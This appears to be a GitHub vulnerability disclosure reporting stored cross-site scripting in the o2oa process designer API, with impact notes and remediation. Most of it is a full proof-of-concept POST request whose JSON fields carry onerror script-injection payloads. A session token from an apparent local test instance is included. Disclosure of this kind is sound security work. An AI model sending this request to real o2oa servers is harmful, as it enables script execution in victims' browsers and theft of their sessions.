Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Stored XSS in /x_processplatform_assemble_designer/jaxrs/process in o2oa ≤ 10.0-410-g3d5e0d2 #184

New issue
New issue
Open
Open
Stored XSS in /x_processplatform_assemble_designer/jaxrs/process in o2oa ≤ 10.0-410-g3d5e0d2#184
@ez-lbz

Description

@ez-lbz
ez-lbz
opened on Aug 19, 2025

Stored XSS in /x_processplatform_assemble_designer/jaxrs/process in o2oa ≤ 10.0-410-g3d5e0d2

Summary

In o2oa versions up to 10.0-410-g3d5e0d2, the endpoint /x_processplatform_assemble_designer/jaxrs/process is vulnerable to stored cross-site scripting (XSS). The vulnerability exists because user-supplied input, such as personal profile fields, is stored without sanitization and later rendered in the application, allowing persistent execution of malicious scripts.

Exploitation

POC:
POST /x_processplatform_assemble_designer/jaxrs/process?v=develop-10.0-410-3d5e0d2&mehus0es HTTP/1.1
Host: localhost
Referer: http://localhost/x_desktop/index.html
Sec-Fetch-Site: same-origin
Content-Type: application/json; charset=UTF-8
Cookie: x-token=Wrr7kmtfAdF_VIsbJE2G23x52vSQNyKzvPAekU6E6zc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/json,*/*
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Authorization: Wrr7kmtfAdF_VIsbJE2G23x52vSQNyKzvPAekU6E6zc
sec-ch-ua-mobile: ?0
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Content-Length: 3591

{
  "name": "\"><img src=1 onerror=alert('hacker')>",
  "alias": "\"><img src=1 onerror=alert('hacker')>",
  "description": "\"><img src=1 onerror=alert('hacker')>",
  "application": "9fce716a-d406-40b8-9b79-7b636bd12cda",
  "creatorPerson": "",
  "createTime": "2025-08-19 09:19:19",
  "lastUpdatePerson": "",
  "lastUpdateTime": "",
  "id": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
  "autoList": [],
  "begin": {
    "process": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
    "name": "开始",
    "alias": "",
    "description": "",
    "position": "200,60",
    "route": "984b67f5-77bb-46c8-bc8d-ac41250708bd",
    "id": "85676808-b46e-4758-a8bd-e38c5cd15d42",
    "createTime": "2025-08-19 09:19:17",
    "type": "begin",
    "readIdentityList": [],
    "readDepartmentList": [],
    "readScript": "",
    "readScriptText": "",
    "reviewIdentityList": [],
    "reviewDepartmentList": [],
    "reviewScript": "",
    "reviewScriptText": "",
    "beforeArriveScript": "",
    "afterArriveScript": "",
    "beforeExecuteScript": "",
    "afterExecuteScript": "",
    "afterInquiryScript": "",
    "edition": "CB5289B9D2B000019433D4C015A0B020",
    "updateTime": "2025-08-19 09:19:17"
  },
  "conditionList": [],
  "choiceList": [],
  "parallelList": [],
  "embedList": [],
  "publishList": [],
  "endList": [
    {
      "id": "6b79c09a-8fda-4817-acda-a7c0f8622704",
      "process": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
      "name": "结束",
      "alias": "",
      "description": "",
      "position": "200,330",
      "createTime": "2025-08-19 09:19:17",
      "type": "end",
      "readIdentityList": [],
      "readDepartmentList": [],
      "readScript": "",
      "readScriptText": "",
      "reviewIdentityList": [],
      "reviewDepartmentList": [],
      "reviewScript": "",
      "reviewScriptText": "",
      "beforeArriveScript": "",
      "afterArriveScript": "",
      "beforeExecuteScript": "",
      "afterExecuteScript": "",
      "edition": "CB5289B9D2E00001C353E2D01FB09320",
      "updateTime": "2025-08-19 09:19:17",
      "routeList": []
    }
  ],
  "invokeList": [],
  "manualList": [],
  "mergeList": [],
  "routeList": [
    {
      "id": "984b67f5-77bb-46c8-bc8d-ac41250708bd",
      "createTime": "2025-08-19 09:19:19",
      "updateTime": "2025-08-19 09:19:19",
      "process": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
      "activityType": "end",
      "activity": "6b79c09a-8fda-4817-acda-a7c0f8622704",
      "name": "开始",
      "alias": "",
      "description": "",
      "track": "",
      "routeScriptIdList": [],
      "position": "",
      "edition": "CB5289BA49700001128A17F136D117FC"
    }
  ],
  "splitList": [],
  "cancelList": [],
  "managerIdentityList": [],
  "reviewIdentityList": [],
  "startableIdentityList": [],
  "startableDepartmentList": [],
  "startableCompanyList": [],
  "beforeBeginScript": "",
  "beforeBeginScriptText": "",
  "afterBeginScript": "",
  "afterBeginScriptText": "",
  "beforeEndScript": "",
  "beforeEndScriptText": "",
  "afterEndScript": "",
  "afterEndScriptText": "",
  "categoryName": "",
  "expireType": "never",
  "expireDay": "7",
  "expireHour": "0",
  "expireWorkTime": true,
  "isNewProcess": true,
  "projectionData": null,
  "applicationName": "\"><img src=1 onerror=alert(1)>",
  "category": "",
  "routeNameAsOpinion": false,
  "startableTerminal": "all",
  "defaultStartMode": "instance",
  "checkDraft": false,
  "serialPhase": "arrive",
  "projectionFully": true,
  "updateTableEnable": false,
  "dataTraceFieldType": "none",
  "serialTexture": "[]",
  "updateTime": "2025-08-19 09:19:19"
}
Image

When the profile is viewed, the stored payload is executed, confirming XSS.

Image

Impact

  • Persistent JavaScript execution in victim browsers

  • Possible theft of session tokens or sensitive user data

  • Unauthorized actions performed on behalf of authenticated users

Remediation

Filter and escape user input in profile fields before storage and ensure proper output encoding when rendering data.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions